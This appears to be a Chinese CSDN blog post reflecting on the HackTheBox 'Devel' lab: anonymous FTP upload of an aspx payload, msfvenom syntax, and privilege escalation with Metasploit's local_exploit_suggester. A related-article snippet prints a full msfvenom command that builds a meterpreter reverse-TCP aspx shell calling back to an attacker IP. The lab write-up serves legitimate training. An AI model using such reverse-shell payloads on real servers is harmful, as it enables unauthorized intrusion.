Hackthebox :: Devel反思总结

最新推荐文章于 2024-09-09 09:57:56 发布
最新推荐文章于 2024-09-09 09:57:56 发布
阅读量381 收藏
点赞数
分类专栏: walkthrough 渗透测试 文章标签: 安全 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missmxr/article/details/121463722
版权

Hackthebox :: Devel反思总结

  • devel是hackthebox上一台简单的windows靶机,我将对其主要内容进行总结与反思

cover

反思

  • 对FTP服务的命令不够熟悉
  • 对msfvenom制作载荷不够熟,msfvenom中变量lhost和lport后面接 ” = “再接参数

总结

  • 部分FTP命令
  • .aspx是一个动态网络页面文件

1

  • 扫描的21号FTP端口看到的信息中,Anonymous FTP login allowed代表着允许匿名登录,iisstart.htm 告知我们在msfvenom中使用aspx格式的文件输出

  • windows提权的过程中,可以在msf中加载 multi/recon/local_exploit_suggester, 这个会给出一些关于提权该靶机的建议,选择合适的建议中的模块就能成功

疑惑

  • 可能是靶机自己的问题,按照网上的walkthrough做了一遍,同样的流程在加载multi/recon/local_exploit_suggester 时出现了错误,set session运行后会话自动断掉了,试了好几次都没用,但是加载这个模块给出的提权模块的时候,set session运行后成功提权,如果下一次还出现这种情况就是我自己的问题,这次记住
维基人
关注
专栏目录
Hackthebox:Devel Walkthrough
汗的博客
12-05 374
预备知识 ftp anonymous登录、任意文件上传、msfvenom生成webshell、meterpreter后渗透 信息收集 nmap 探测一下开放端口和服务 nmap 10.10.10.5 结果如下 Nmap scan report for 10.10.10.5 Host is up (0.34s latency). Not shown: 998 filtered ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http Nmap
HackTheBox-Devel渗透测试
weixin_43111940的博客
04-15 209
端口信息 sudo nmap -sC -sV -A -p 21,80 10.10.10.5 匿名访问21端口,把里面的文件下载下来 访问80端口,是IIS7.0的 查看源码也没有什么收获 目录扫描发现了/aspnet_client 目录 gobuster dir -u http://10.10.10.5:80 -w /usr/share/wordlists/dirb/common.txt 重点来了,/aspnet_client就是ftp里发现的文件夹!(其实看到有iisstart.htm也可以猜
Hack the box靶机 Devel
菜浪马废的博客
05-27 275
Web服务器[IIS支持.aspx .asp文件] 做了两个windows的 walkthrough都是教用msf提权的 难道我msf一定要用到win上么?
Hack The Box::Devel
aya3t的博客
10-10 188
Hack The Box::Devel
hackthebox-Devel (考点:ftp/IIS/windows)不用msf
冬萍子癸水
04-09 392
用msf做很快,很多人做这台机器写writeup也是用msf做的。但针对oscp,本篇文章不用msf nmap 看到21ftp要想到进去看看,找敏感文件 匿名anonymous进入 也没啥。但是你也有可能看到一些shell已经在里面了,那是因为之前有人做的留下的。开启机器,不一定会全部重置,会有前人的痕迹。我发现是这样。 可以看到IIS的图片。 再看80 扫描,没什么发现 打开80网页10.1...
db4-devel和libcap-devel
11-12
在linuxpython安装过程中可能会有db4-devel和libcap-devel不能知道的问题可下载文档使用rpm -ivh libpcap-1.9.0-3.el8.x86_64.rpm libpcap-devel-1.9.0-3.el8.x86_64.rpm libdb4-4.8.30-30.el8.x86_64.rpm libdb4-...
Python devel安装失败问题解决方案
01-20
如果你遇到python-devel无法安装的问题,发现如下错误: [root@localhost mongodb-src-r4.2.7]# yum install python-devel Last metadata expiration check: 0:05:23 ago on Sun 07 Jun 2020 12:53:56 AM CST. No ...
Name : ncurses-devel Version : 5.7
09-19
Install the ncurses-devel package if you want to develop applications which will use ncurses. Use the following compiler flags to build against the ncurses library: -lncurses (compile and link ...
Linux: Package:libaio-devel-0.3.109 (x86_64)
suchenbin的博客
07-25 5813
Linux创建Oracle时,在Prerequis ite Checks时出现如下问题: This is a prerequisite condition to test whether the package "libaio-devel-0.3.109 (x86_64)" is available on the system.(more details) Expected Value:...
里面包含有zlib-devel-1.2.7-17、openssl-devel-1.0.2k-16.el7.x86_64.rpm、
09-08
里面包含有一些比较老版本的依赖,这些rpm包很不好找,费了好大劲才找到,给有需要的人,里面包含有openssl-1.1.1b.tar、openssl-devel-1.0.2k-16.el7.x86_64.rpm、zlib-1.2.7-18.el7.x86_64.rpm、zlib-devel-1.2.7-...
hack the box devel靶机
zr1213159840的博客
04-23 2441
打开靶机,开扫,能看出来开了ftp和80端口,而且ftp能匿名访问。 nmap -sV -Pn -A 10.10.10.5 访问地址能发现就是IIS的界面,本来想着下面也许会有东西,但是爆破后没东西。登录一下ftp,发现进了网站的目录,测试上传的东西后,确实是网站的目录,那么就可以上传木马了。 生成asp木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f aspx -o shell.aspx 在
【Hack The Box】windows练习-- devel
人间体佐菲的博客
10-28 1155
【Hack The Box】windows练习-- devel
No.68-HackTheBox-windows-Devel-Walkthrough渗透学习
qq_34801745的博客
03-14 436
** HackTheBox-windows-Devel-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/3 靶机难度:初级(3.9/10) 靶机发布日期:2017年10月3日 靶机描述: Devel, while relatively simple, demonstrates the security risk...
HTB Devel[Hack The Box HTB靶场]writeup系列3
重新启程
02-01 2709
Retired Machines的第三台机器Devel 目录 0x00 靶机情况 0x01 端口扫描 0x02 ftp服务 0x03 上传payload 0x04 get webshell 0x05 提权 0x00 靶机情况 从靶机的情况来看,难度属于初级,基本上都是选择1、2、3分为主,操作系统是windows 0x01 端口扫描 看看靶机提供了哪些服务: roo...
Hack The Box -----------------------Active
大方子
12-16 6948
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
metasploit - local_exploit_suggester
Nixawk
08-15 3239
msf post(local_exploit_suggester) > show options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- ---------------
Windows内核漏洞利用提权教程
systemino的博客
04-19 1478
PS. 本文仅限于技术讨论,严禁用于其他用途。 继上一篇“使用自动化脚本进行Windows提权”,本文将介绍有关Windows内核漏洞提权的方法。我将使用内置的Metasploit模块作为演示。通过本文的学习,你将了解系统的哪些部分可被利用,并匹配最佳可利用模块进一步的提升权限。 Windows-Exploit-suggester Metasploit内置模块提供了各种可用于提权的local...
零信任安全:重新思考数字世界的访问
最新发布
网络研究观
09-09 786
零信任安全在当前数字时代的关键重要性和有效性,将其作为增强网络安全弹性的基本战略。‍
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 955
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
安装python3.6 未找到匹配的参数: db4-devel 错误:没有任何匹配: db4-devel
11-11
在安装Python 3.6时出现了"未找到匹配的参数: db4-devel"和"错误: 没有任何匹配: db4-devel"的报错信息。这是因为系统中没有找到名为db4-devel的软件包。db4-devel是一个依赖包,用来支持Python的数据库模块。在安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值